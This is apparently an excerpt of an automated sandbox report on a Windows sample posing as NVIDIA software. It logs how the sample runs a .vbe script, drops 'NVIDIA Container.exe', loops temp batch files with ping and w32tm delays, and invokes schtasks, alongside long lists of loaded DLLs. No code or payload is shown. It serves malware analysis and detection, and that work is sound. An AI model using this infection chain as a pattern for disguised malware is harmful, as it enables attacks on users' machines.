Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\B0uJAwGmBV.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\s4Al4mMfKa.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\sxRqhXCXyo.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ij3ogloIkp.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1QWUF8ga47.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\FuUFRpewDb.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\L4pr7KvdK9.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\NVIDIA\WRqwjVLhswP6l4C4Fp0FJhl.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\NVIDIA\RbwXTgCxu.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe "C:\Users\user\AppData\Roaming\NVIDIA/NVIDIA Container.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\vPPPhWVNfR.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1LArpmQ7xZ.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\cMdeBf80Aw.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\B0uJAwGmBV.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\s4Al4mMfKa.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\sxRqhXCXyo.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ij3ogloIkp.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1QWUF8ga47.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\FuUFRpewDb.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\L4pr7KvdK9.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
